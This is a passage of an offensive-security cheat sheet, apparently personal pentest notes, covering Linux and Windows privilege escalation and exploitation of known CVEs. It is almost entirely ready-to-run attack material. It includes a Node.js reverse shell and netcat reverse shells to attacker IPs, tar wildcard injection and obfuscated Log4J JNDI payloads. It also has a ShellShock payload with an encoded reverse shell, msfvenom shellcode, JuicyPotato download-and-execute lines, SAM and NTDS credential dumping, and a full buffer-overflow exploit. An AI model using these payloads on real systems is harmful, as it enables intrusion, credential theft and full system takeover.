/tmp/reverse.js 3380 | (function(){ 3381 | var net = require("net"), 3382 | cp = require("child_process"), 3383 | sh = cp.spawn("/bin/sh", []); 3384 | var client = new net.Socket(); 3385 | client.connect(1337, "10.10.14.23", function(){ 3386 | client.pipe(sh.stdin); 3387 | sh.stdout.pipe(client); 3388 | sh.stderr.pipe(client); 3389 | }); 3390 | return /a/; // Prevents the Node.js application form crashing 3391 | })(); 3392 | 3393 | # Commands 3394 | sudo /sbin/initctl stop test 3395 | sudo /sbin/initctl start test 3396 | ``` 3397 | 3398 | ### WildCard (*) 3399 | 3400 | ```bash 3401 | #===Chown/Chmod=== 3402 | - Imagine there is a cronjob 3403 | * chown user1:user2 /opt/* 3404 | - touch -- --reference=reference 3405 | - touch reference 3406 | - chmod 6777 reference 3407 | - ln -s /etc/shadow /opt/shadow 3408 | - ln -d -s /root /opt/root 3409 | 3410 | ## References 3411 | - https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/ 3412 | 3413 | #===Tar=== 3414 | - Imagine there is cronjob 3415 | * cd /opt;tar cf /opt/backup.tar * 3416 | - touch -- "--checkpoint=1" 3417 | - touch -- "--checkpoint-action=exec=sh shell.sh" 3418 | - echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 443 >/tmp/f" > shell.sh 3419 | - echo "cp /bin/bash /tmp/bash; chmod u+s /tmp/bash" > shell.sh 3420 | - chmod 777 ./"--checkpoint=1" 3421 | - chmod 777 ./"--checkpoint-action=exec=sh shell.sh" 3422 | - chmod 777 shell.sh 3423 | 3424 | #===Parameter=== 3425 | - Imagine there is wildcard in binary with --help 3426 | * sudo cat * --help 3427 | - sudo cat /etc/paswd -help 3428 | - Try to look if there is any more parameter that can run so that it will run that before --help 3429 | 3430 | ## References 3431 | - https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/ 3432 | - https://book.hacktricks.xyz/linux-unix/privilege-escalation/wildcards-spare-tricks 3433 | 3434 | ``` 3435 | 3436 | ### Vim 3437 | 3438 | ```bash 3439 | # SUID 3440 | vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' 3441 | vim.basic -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' 3442 | vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' 3443 | vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p") 3444 | ``` 3445 | 3446 | ### Passwd Writable 3447 | 3448 | ```bash 3449 | # Change root password 3450 | -> openssl passwd password123 3451 | -> replace in root row 3452 | -> root:c.gVrEYFACZTQ:0:0:root:/root:/bin/bash 3453 | 3454 | ``` 3455 | 3456 | ### LD Preload 3457 | 3458 | ```bash 3459 | $ ===One=== 3460 | include 3461 | include 3462 | include 3463 | void _init() { 3464 | unsetenv("LD_PRELOAD"); 3465 | setgid(0); 3466 | setuid(0); 3467 | system("/bin/sh"); 3468 | } 3469 | gcc -fPIC -shared -o shell.so shell.c -nostartfiles 3470 | sudo LD_PRELOAD=/tmp/shell.so find 3471 | ``` 3472 | 3473 | ### Csvtools 3474 | 3475 | ```bash 3476 | # Commands 3477 | sudo csvtool call '/bin/sh;false' /etc/passwd -t --help 3478 | ``` 3479 | 3480 | ### Systemctl 3481 | 3482 | ```bash 3483 | # SUID 3484 | -> https://gist.github.com/A1vinSmith/78786df7899a840ec43c5ddecb6a4740 3485 | 3486 | ``` 3487 | 3488 | ### Screen 3489 | 3490 | ```bash 3491 | # SUID 3492 | -> screen -x root/shared 3493 | -> 3494 | https://possiblelossofprecision.net/?p=1993 3495 | 3496 | # SUDO 3497 | -> sudo screen 3498 | ``` 3499 | 3500 | # D. Exploit/CVE/Abuse/Misconf 3501 | 3502 | ### Sudo - Security Bypass 3503 | 3504 | ```bash 3505 | # What we will see? 3506 | (ALL,!root) /bin/bash 3507 | (ALL, !root) /usr/bin/ssh 3508 | 3509 | # Commands 3510 | sudo -u#-1 ssh -o ProxyCommand=';sh 0<&2 1>&2' x 3511 | sudo -u#-1 /bin/bash 3512 | 3513 | # References 3514 | https://www.exploit-db.com/exploits/47502 3515 | ``` 3516 | 3517 | ### Zero Logon (CVE-2020-1472) 3518 | 3519 | ```bash 3520 | => Github 3521 | $ https://github.com/dirkjanm/CVE-2020-1472 3522 | 3523 | => Commands (Exploit) 3524 | $ python3 cve-2020-1472-exploit.py BANK 10.10.10.10 3525 | 3526 | => Commands (Restore Password) 3527 | $ Get plain_password_hex 3528 | -> secretsdump.py bank.local/Administrator@BANK -target-ip 10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460 3529 | $ python3 restorepassword.py return.local/printer@printer -target-ip 10.10.11.108 -hexpass 3530 | 3531 | => References 3532 | $ https://nv2lt.github.io/windows/CVE-2020-1472-Step-by-Step-Procedure/ 3533 | 3534 | ``` 3535 | 3536 | ### NoPac (CVE-2021-42278 & CVE-2021-42287) 3537 | 3538 | ```bash 3539 | => GitHub 3540 | $ https://github.com/Ridter/noPac 3541 | 3542 | => Commands 3543 | $ python3 noPac.py bank.local/user:password -dc-ip 10.0.10.10 -dc-host DC01 --impersonate administrator -dump 3544 | 3545 | => References 3546 | $ https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing 3547 | ``` 3548 | 3549 | ### Log4J 3550 | 3551 | ```bash 3552 | => Marshalsec 3553 | $ git clone https://github.com/mbechler/marshalsec.git 3554 | $ cd marshalsec 3555 | $ sudo apt install maven 3556 | $ mvn clean package -DskipTests 3557 | 3558 | => Payload 3559 | ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/} 3560 | ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/} 3561 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z} 3562 | ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} 3563 | ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} 3564 | ${${::-j}ndi:rmi://attackerendpoint.com/} 3565 | ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc} 3566 | ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc} 3567 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/} 3568 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc} 3569 | ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/} 3570 | ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc} 3571 | ${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/} 3572 | ${jndi:ldap://ATTACKERCONTROLLEDHOST} 3573 | ${jndi:rmi://adsasd.asdasd.asdasd} 3574 | 3575 | => Exploit (1) 3576 | $ https://github.com/veracode-research/rogue-jndi 3577 | $ java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,}|{base64,-d}|{bash,-i}" --httpPort 8888 --hostname 10.10.10.10 3578 | $ java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "nc -e /bin/sh 10.10.10.10 1337" --httpPort 8888 --hostname 10.10.10.10 3579 | $ ${jndi:ldap://10.10.10.10/o=tomcat} 3580 | 3581 | => References 3582 | $ https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/ 3583 | $ https://twitter.com/marcioalm/status/1470361495405875200?s=20 3584 | $ https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java 3585 | $ https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf 3586 | $ https://www.sprocketsecurity.com/blog/how-to-exploit-log4j-vulnerabilities-in-vmware-vcenter 3587 | ``` 3588 | 3589 | ### ShellShock 3590 | 3591 | ```bash 3592 | # Payload 3593 | curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.10/cgi-bin/test.cgi 3594 | curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExOS4xMjMvNDQzIDA+JjE= | base64 -d | bash'" http://10.10.10.10/cgi-bin/admin.cgi 3595 | 3596 | # Refernces 3597 | https://github.com/opsxcq/exploit-CVE-2014-6271 3598 | ``` 3599 | 3600 | ### CVE-2021-41773 & CVE-2021-42013 3601 | 3602 | ```bash 3603 | # Affected Version 3604 | -> Apache 2.4.49 3605 | -> Apache 2.4.50 3606 | 3607 | # References 3608 | -> https://github.com/iilegacyyii/PoC-CVE-2021-41773 3609 | -> https://www.exploit-db.com/exploits/50406 3610 | ``` 3611 | 3612 | ### MS-17-010 3613 | 3614 | ```bash 3615 | # Commands 3616 | git clone https://github.com/helviojunior/MS17-010.git 3617 | msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 -f exe > eternalblue.exe 3618 | nc -nlvp 443 3619 | python send_and_execute.py 10.10.10.4 //eternalblue.exe 3620 | python checker.py 10.10.10.10 3621 | 3622 | # Change username if needed for authentication 3623 | 3624 | # References 3625 | - https://github.com/helviojunior/MS17-010.git 3626 | - https://www.hackers-arise.com/post/2018/11/30/network-forensics-part-2-packet-level-analysis-of-the-eternalblue-exploit 3627 | ``` 3628 | 3629 | ### MS08-067 3630 | 3631 | ```bash 3632 | # Commands 3633 | msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode -a x86 --platform windows 3634 | # Replace the b" -> " 3635 | nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 10.10.10.4 # Check versio 3636 | # Replace the shellcode inside the exploit script 3637 | # Ensure the payload total would be 410 3638 | # "\x90" * (410 - len(shellcode)) 3639 | 3640 | # Run Exploit 3641 | # 7 -> Windows XP SP3 English (AlwaysOn NX) 3642 | python exploit.py 10.10.10.4 7 445 3643 | 3644 | # References 3645 | - https://www.exploit-db.com/exploits/40279 3646 | ``` 3647 | 3648 | ### SeImpersonatePrivilege 3649 | 3650 | ```bash 3651 | # Tecnique 1 3652 | wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe 3653 | PrintSpoofer.exe -i -c cmd 3654 | .\PrintSpoofer.exe -i -c "whoami" 3655 | .\PrintSpoofer.exe -i -c "powershell ls" 3656 | .\PrintSpoofer.exe -i -c "powershell.exe -e YwBhAHQAIAAvAHUAcwBlAHIAcwAvAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIALwBkAGUAcwBrAHQAbwBwAC8AcgBvAG8AdAAuAHQAeAB0AA==" 3657 | 3658 | # Technique 2 3659 | ##First 3660 | git clone https://github.com/CCob/SweetPotato.git 3661 | run .sln and compile as .exe (Make sure off anti-virus first) 3662 | SweetPotato.exe -p cmd.exe 3663 | 3664 | ##Second 3665 | git clone https://github.com/uknowsec/SweetPotato.git 3666 | run .sln and compile as .exe (Make sure off anti-virus first) 3667 | SweetPotato.exe -a "whoami" 3668 | 3669 | # Technique 3 3670 | wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe 3671 | JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t * 3672 | JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t * 3673 | JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami" -t * 3674 | 3675 | # Metasploit 3676 | 3677 | ``` 3678 | 3679 | ### SeBackupPrivilege 3680 | 3681 | ```bash 3682 | # How to grant this privilege? 3683 | powershell -ep bypass 3684 | Enable-PSRemoting -Force 3685 | Install-Module -Name carbon 3686 | Import-Module carbon 3687 | Grant-CPrivilege -Identity aniq -Privilege SeBackupPrivilege 3688 | Test-CPrivilege -Identity aniq -Privilege SeBackupPrivilege 3689 | 3690 | # Commands (1) 3691 | cd c:\ 3692 | mkdir Temp 3693 | reg save hklm\sam c:\Temp\sam 3694 | reg save hklm\system c:\Temp\system 3695 | cd Temp 3696 | download sam 3697 | download system 3698 | pypykatz registry --sam sam system 3699 | 3700 | # Commands (2) 3701 | nano aniq.dsh 3702 | -> set context persistent nowriters 3703 | -> add volume c: alias aniq 3704 | -> create 3705 | -> expose %aniq% z: 3706 | unix2dos aniq.dsh 3707 | cd C:\Temp 3708 | upload aniq.dsh 3709 | diskshadow /s aniq.dsh 3710 | robocopy /b z:\windows\ntds . ntds.dit 3711 | reg save hklm\system c:\Temp\system 3712 | cd C:\Temp 3713 | download ntds.dit 3714 | download system 3715 | secretsdump.py -ntds ntds.dit -system system local 3716 | 3717 | # References 3718 | https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/ 3719 | ``` 3720 | 3721 | ### MS11-046 3722 | 3723 | ```bash 3724 | # Save it in one file 3725 | exploit.c 3726 | 3727 | # Compile 3728 | sudo apt-get update 3729 | sudo apt-get install mingw-w64 3730 | i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32 3731 | 3732 | # Run 3733 | exploit.exe 3734 | 3735 | # References 3736 | - https://www.exploit-db.com/exploits/40564 3737 | ``` 3738 | 3739 | ### MS16-098 3740 | 3741 | ```bash 3742 | # Download 3743 | wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe 3744 | 3745 | # Usage 3746 | exploit.exe 3747 | 3748 | # References 3749 | https://www.exploit-db.com/exploits/41020 3750 | ``` 3751 | 3752 | ### MS10-059 3753 | 3754 | ```bash 3755 | # Download 3756 | wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe 3757 | 3758 | # Usage (Reverse Shell) 3759 | exploit.exe 10.10.14.16 9002 3760 | 3761 | # References 3762 | ``` 3763 | 3764 | ### Token Kidnapping (Windows 2003) 3765 | 3766 | ```bash 3767 | # Download 3768 | wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe 3769 | 3770 | # Usage 3771 | churrasco.exe "whoami" 3772 | 3773 | # References 3774 | https://www.exploit-db.com/exploits/6705 3775 | ``` 3776 | 3777 | ### DirtySock 3778 | 3779 | ```bash 3780 | # Download 3781 | wget https://github.com/initstring/dirty_sock/archive/master.zip 3782 | 3783 | # Usage 3784 | unzip 3785 | cd dirty_sock 3786 | python3 dirty_sockv2.py 3787 | 3788 | # Then 3789 | su dirty_sock 3790 | * dirty_sock 3791 | ``` 3792 | 3793 | ### ChrootKit 3794 | 3795 | ```bash 3796 | - If you found chrootkit run in background then you can try this 3797 | 3798 | # Steps 3799 | echo "cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash" > /tmp/update 3800 | /tmp/bash -p 3801 | ``` 3802 | 3803 | ### IIS 6.0 (CVE-2017-7269) 3804 | 3805 | ```bash 3806 | # Download 3807 | wget https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell -O exploit.py 3808 | 3809 | # Usage 3810 | python exploit.py 10.10.10.10 80 10.10.10.20 443 3811 | ``` 3812 | 3813 | ### AlwaysInstall Elevated 3814 | 3815 | ```bash 3816 | # Payload 3817 | msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=9002 –f msi > install.msi 3818 | msfvenom -p windows/x64/shell_reverse_tcp lhost=tun0 lport=9002 –f msi > install.msi 3819 | msiexec /quiet /qn /i install.msi 3820 | ``` 3821 | 3822 | ### Ptrace 3823 | 3824 | ```bash 3825 | # Download 3826 | wget https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c 3827 | 3828 | # Compile 3829 | gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root 3830 | 3831 | # Usage 3832 | ./ptrace_traceme_root 3833 | ``` 3834 | 3835 | ### FTP Backdoor Command Execution 3836 | 3837 | ```bash 3838 | # Download 3839 | wget https://raw.githubusercontent.com/ahervias77/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py 3840 | 3841 | # Manually 3842 | - Use "user:)" as user and use "pass" as pass 3843 | └─▶ ftp 10.10.10.131 3844 | Connected to 10.10.10.131. 3845 | 220 (vsFTPd 2.3.4) 3846 | Name (10.10.10.131:root): user:) 3847 | 331 Please specify the password. 3848 | Password: pass 3849 | 3850 | # Usage 3851 | └─▶ python3 vsftpd_234_exploit.py 10.150.150.12 21 whoami 3852 | [*] Attempting to trigger backdoor... 3853 | [+] Triggered backdoor 3854 | [*] Attempting to connect to backdoor... 3855 | [+] Connected to backdoor on 10.150.150.12:6200 3856 | [+] Response: 3857 | root 3858 | 3859 | # References 3860 | - https://www.programmersought.com/article/18706301160/ 3861 | ``` 3862 | 3863 | ### Shadow Writable 3864 | 3865 | ```bash 3866 | - Generate weak password in http://sha512crypt.pw/ 3867 | 3868 | # Example - password 3869 | $6$Zwdp3uo2Hg1HUvlc$wYEAwd5o9C5xQ1yX97izpRp/IhH4Dk1BzgprmQmK2P9/GnYTCIxzpF63/jelcdi6FjSIXxbirfn8o2gR1rHZq0 3870 | 3871 | - replace in root hash 3872 | 3873 | # Commands 3874 | su root 3875 | ``` 3876 | 3877 | ### Laravel Remote Code Execution (CVE-2018-15133) 3878 | 3879 | ```bash 3880 | # Step By Step 3881 | 1. Get APP_KEY 3882 | * APP_KEY=base64:d2PlewM8mV4bhlJZQTqvatC3XWexy+AlMqUwCP6YuKg= 3883 | 2. Use phpgc (Command) 3884 | * ./phpggc Laravel/RCE1 system "id" -b 3885 | * ./phpggc Laravel/RCE2 system "id" -b 3886 | * ./phpggc Laravel/RCE3 system "id" -b 3887 | * ./phpggc Laravel/RCE4 system "id" -b 3888 | * ./phpggc Laravel/RCE5 system "id" -b 3889 | * ./phpggc Laravel/RCE6 system "id" -b 3890 | * ./phpggc Laravel/RCE7 system "id" -b 3891 | 3. Use the CVE php script 3892 | * ./cve-2018-15133.php 3893 | 4. Put it in cookie (POST) 3894 | 3895 | # Notes 3896 | -> Remember on gadgetchains/Laravel/RCE, there is others that you can try 3897 | 3898 | # References 3899 | https://github.com/kozmic/laravel-poc-CVE-2018-15133 3900 | https://snyk.io/vuln/SNYK-PHP-LARAVELFRAMEWORK-174581 3901 | ``` 3902 | 3903 | ### OpenSMPTD < 6 (Local Privesc) 3904 | 3905 | ```bash 3906 | # Save as exploit.pl 3907 | https://www.exploit-db.com/exploits/48051 3908 | 3909 | # Usage 3910 | perl exploit.pl LPE #local 3911 | perl exploit.pl RCE 10.0.0.162 10.0.0.24 example.org 3912 | ``` 3913 | 3914 | ### CVE-2021-32749 3915 | 3916 | ```bash 3917 | # Payload 3918 | ~! 3919 | ~! bash 3920 | 3921 | # Referemces 3922 | https://github.com/fail2ban/fail2ban/security/advisories/GHSA-m985-3f3v-cwmm 3923 | https://hackmyvm.eu/machines/machine.php?vm=Texte 3924 | ``` 3925 | 3926 | 3927 | ### PHP Info + LFI 3928 | 3929 | ```bash 3930 | # Downloads 3931 | https://raw.githubusercontent.com/roughiz/lfito_rce/master/lfito_rce.py 3932 | 3933 | # Commands 3934 | -> python lfito_rce.py -l "http://10.10.10.10/test.php?page=" --lhost 10.10.10.9 --lport 9001 -i "http://10.10.10.105/info.php" -t 100 -a 1 --payload 2 --verbose true 3935 | 3936 | # References 3937 | -> https://rafalharazinski.gitbook.io/security/other-web-vulnerabilities/local-remote-file-inclusion/phpinfo-log-race-condition 3938 | => https://raw.githubusercontent.com/VineshChauhan24/LFI-phpinfo-RCE/master/exploit.py 3939 | ``` 3940 | 3941 | ### DirtyCow 3942 | 3943 | ```bash 3944 | # Download 3945 | https://github.com/exrienz/DirtyCow 3946 | 3947 | # Usage 3948 | gcc -pthread dirty.c -o dirty -lcrypt 3949 | ./dirty password 3950 | ``` 3951 | 3952 | ### Linux Kernel Exploit 3953 | 3954 | ```bash 3955 | # Kernel 3956 | 3957 | # <= 2.6.36-rc8 3958 | - https://www.exploit-db.com/exploits/15285 3959 | 3960 | # < 2.6.37 3961 | - https://www.exploit-db.com/exploits/15704 3962 | 3963 | # < 3.10 3964 | - https://www.exploit-db.com/exploits/18411 3965 | * https://github.com/lucyoa/kernel-exploits/tree/master/memodipper 3966 | 3967 | # < 3.19 3968 | - https://www.exploit-db.com/exploits/37292 3969 | 3970 | # = 3.2.0.23 (Ubuntu 12.04) 3971 | - https://www.exploit-db.com/exploits/33589 3972 | 3973 | # <= 4.4.0-116 3974 | - https://www.exploit-db.com/exploits/44298 3975 | 3976 | # < 5.11 3977 | - https://github.com/briskets/CVE-2021-3493 3978 | 3979 | # References 3980 | -> https://github.com/evait-security/ClickNRoot (Kernel Exploit) 3981 | ``` 3982 | 3983 | ### SambaCry RCE: CVE-2017–7494 3984 | 3985 | ```bash 3986 | # Vulnerable Versions 3987 | - Within versions 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14. 3988 | 3989 | # Downloads 3990 | https://github.com/joxeankoret/CVE-2017-7494 3991 | 3992 | # Commands (Metasploit) 3993 | use linux/samba/is_known_pipename 3994 | set SMB::AlwaysEncrypt false 3995 | set SMB::ProtocolVersion 1 3996 | set rhosts 10.10.10.10 3997 | 3998 | # Commands Manual 3999 | 4000 | 4001 | # References 4002 | - https://bond-o.medium.com/sambacry-rce-cve-2017-7494-41c3dcc0b7ae 4003 | ``` 4004 | 4005 | ### Microsoft Exchange Server RCE (CVE-2021-26855) 4006 | 4007 | ```bash 4008 | # References 4009 | - https://motasem-notes.net/how-to-test-if-your-exchange-server-is-compromised-and-vulnerable/ 4010 | - https://github.com/microsoft/CSS-Exchange/tree/main/Security 4011 | - https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers 4012 | ``` 4013 | 4014 | ### PrintNightmare (CVE-2021-1675) 4015 | 4016 | ```bash 4017 | # Download 4018 | https://github.com/afwu/PrintNightmare 4019 | 4020 | # Check If vulnerable (If Got Values) 4021 | rpcdump.py @10.10.120.242 | egrep 'MS-RPRN|MS-PAR' 4022 | 4023 | # Sysmon (Look into) 4024 | - Event 11 -> spoolsv.exe Writing 4025 | - Event 23 -> Deleting .dll files on C:\Windows\System32\spool\drivers\x64\* 4026 | 4027 | # Disabling Print Spooler Service 4028 | Stop-Service -Name Spooler -Force 4029 | Set-Service -Name Spooler -StartupType Disabled 4030 | 4031 | # Monitor 4032 | - Log entries in Microsoft-Windows-PrintService/Admin 4033 | 4034 | # Enabled 4035 | - Microsoft-Windows-PrintService/Operational logging 4036 | 4037 | # Detection References 4038 | https://github.com/LaresLLC/CVE-2021-1675 4039 | 4040 | # Exploit (https://github.com/cube0x0/CVE-2021-1675) 4041 | msfvenom -p windows/x64/exec CMD='cmd.exe /k "net localgroup administrators username /add"' EXITFUNC=none RC4PASSWORD=S3cr3tP4sw0rdz123 -f dll -o payload.dll 4042 | .\SharpPrintNightmare.exe C:\Users\username\Documents\payload.dll 4043 | -> Make sure read the installation first. 4044 | 4045 | # Local 4046 | IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.6/payload.ps1') 4047 | Invoke-Nightmare -NewUser "username" -NewPassword "password" 4048 | 4049 | # Remote 4050 | msfvenom -p windows/x64/exec CMD='cmd.exe /k "net user /add test123 test123 && net localgroup administrators test123 /add"' EXITFUNC=none -f dll -o payload.dll 4051 | ./CVE-2021-1675.py bank.local/username:password@10.10.10.10 'C:\Users\users\Documents\payload.dll' 4052 | 4053 | # Detect 4054 | REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" 4055 | 4056 | # References 4057 | https://msandbu.org/printnightmare-cve-2021-1675/ 4058 | https://www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution 4059 | https://community.carbonblack.com/t5/Query-Exchange/Finding-Registry-Keys-Used-for-PrintNightmare-CVE-2021-34527/idi-p/105368 4060 | ``` 4061 | 4062 | ### Buffer Overflow (BOF) 4063 | 4064 | ```bash 4065 | =======Setup mona.py======= 4066 | # Download mona.py 4067 | wget https://raw.githubusercontent.com/corelan/mona/master/mona.py 4068 | 4069 | # Upload into the machine 4070 | certutil -URLCache -f http://10.10.10.10/mona.py mona.py 4071 | 4072 | # Put into Immunity Debugger Folder 4073 | C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands\mona.py 4074 | @ 4075 | C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands\mona.py 4076 | 4077 | # Run Immunity Debugger and config mona (Make sure run as Administrator) 4078 | !mona config -set workingfolder c:\mona\%p 4079 | 4080 | =======Mona Commands======= 4081 | # Config Mona 4082 | !mona config -set workingfolder c:\mona\%p 4083 | 4084 | # Create bytearray 4085 | !mona bytearray -b "\x00" # BadCharacter 4086 | 4087 | # Find Offset with length of pattern created 4088 | !mona findmsp -distance 2400 4089 | 4090 | # Compare bad characters with ESP 4091 | !mona compare -f C:\mona\binary\bytearray.bin -a 0124FA18 #ESP 4092 | 4093 | # Find the jump point 4094 | !mona jmp -r esp -cpb "\x00\x0a" # BadCharacter 4095 | 4096 | =======Fuzzing (fuzzer.py)======= 4097 | import socket, time, sys 4098 | 4099 | ip = "192.168.0.195" 4100 | 4101 | port = 31337 4102 | timeout = 5 4103 | strings = b"A" * 50 4104 | 4105 | while True: 4106 | try: 4107 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4108 | s.settimeout(timeout) 4109 | s.connect((ip,port)) 4110 | s.send(strings + b"\r\n") 4111 | print(s.recv(1024)) 4112 | except: 4113 | print("Fuzzing crashed at {} bytes".format(len(strings))) 4114 | sys.exit(0) 4115 | strings += b"A" * 50 4116 | time.sleep(1) 4117 | 4118 | =======Finding offset======= 4119 | msf-pattern_create -l 150 # Create Pattern 4120 | !mona findmsp -distance 150 # Mona commands to find offset 4121 | 4122 | # crash.py 4123 | import socket, time, sys 4124 | 4125 | ip = "192.168.0.195" 4126 | port = 31337 4127 | 4128 | payload = b"" 4129 | 4130 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4131 | s.connect((ip,port)) 4132 | s.send(payload + b"\r\n") 4133 | print(s.recv(1024)) 4134 | 4135 | # crash2.py 4136 | import socket, time, sys 4137 | 4138 | ip = "192.168.0.195" 4139 | port = 31337 4140 | 4141 | offset = 146 4142 | overflow = b"A" * offset 4143 | retrn = b"BBBB" 4144 | payload = overflow + retrn 4145 | 4146 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4147 | s.connect((ip,port)) 4148 | s.send(payload + b"\r\n") 4149 | print(s.recv(1024)) 4150 | 4151 | =======Finding Bad Characters & Jump Point======= 4152 | !mona bytearray -b "\x00" # Generate Bytearray 4153 | !mona compare -f C:\mona\gatekeeper\bytearray.bin -a 020C19F8 # Check bad character we found 4154 | !mona jmp -r esp -cpb "\x00\x0a" # Find jump point 4155 | 4156 | # badchar.py 4157 | print("\t----------------------") 4158 | print("\t| BAD CHARACTER |") 4159 | print("\t----------------------") 4160 | print("\n[+] Example No Badchar (Please include \\x00) => Enter Bad Characters: \\x00") 4161 | print("[+] Example Got Badchar => Enter Bad Characters: \\x02\\x03\\x04") 4162 | 4163 | INPUTS = raw_input("\n[+] Enter Bad Characters: ") 4164 | OUTPUT_INPUTS = r"{0}".format(INPUTS) 4165 | LISTREM = INPUTS.split("\\x") 4166 | LISTBADCHAR = r"" 4167 | for x in range(1,256): 4168 | if "{:02x}".format(x) not in LISTREM: 4169 | LISTBADCHAR += r"\x" + "{:02x}".format(x) 4170 | print(LISTBADCHAR) 4171 | 4172 | # badchar_check.py 4173 | import socket, time, sys 4174 | 4175 | ip = "192.168.0.195" 4176 | port = 31337 4177 | 4178 | offset = 146 4179 | overflow = b"A" * offset 4180 | retrn = b"BBBB" 4181 | strings = b"" 4182 | payload = overflow + retrn + strings 4183 | 4184 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4185 | s.connect((ip,port)) 4186 | s.send(payload + b"\r\n") 4187 | print(s.recv(1024)) 4188 | 4189 | =======Final======= 4190 | # msfvenom 4191 | msfvenom -p windows/shell_reverse_tcp LHOST=eth0 LPORT=443 -b '\x00\x0a' EXITFUNC=thread -f python -v strings 4192 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -b '\x00\x0a' EXITFUNC=thread -f python -v strings 4193 | 4194 | # exploit.py 4195 | import socket, time, sys 4196 | 4197 | ip = "192.168.0.195" 4198 | port = 31337 4199 | 4200 | offset = 146 4201 | overflow = b"A" * offset 4202 | retrn = b"\xc3\x14\x04\x08" 4203 | strings = b"" 4204 | strings += b"\xbf\xa3\xe1\x47\xc1\xda\xd7\xd9\x74\x24\xf4\x5e" 4205 | # 4206 | padding = b"\x90" * 16 4207 | payload = overflow + retrn + padding + strings 4208 | 4209 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4210 | s.connect((ip,port)) 4211 | s.send(payload + b"\r\n") 4212 | print(s.recv(1024)) 4213 | 4214 | =======References======= 4215 | https://medium.com/swlh/tryhackme-buffer-overflow-prep-9b2ece17a13c 4216 | 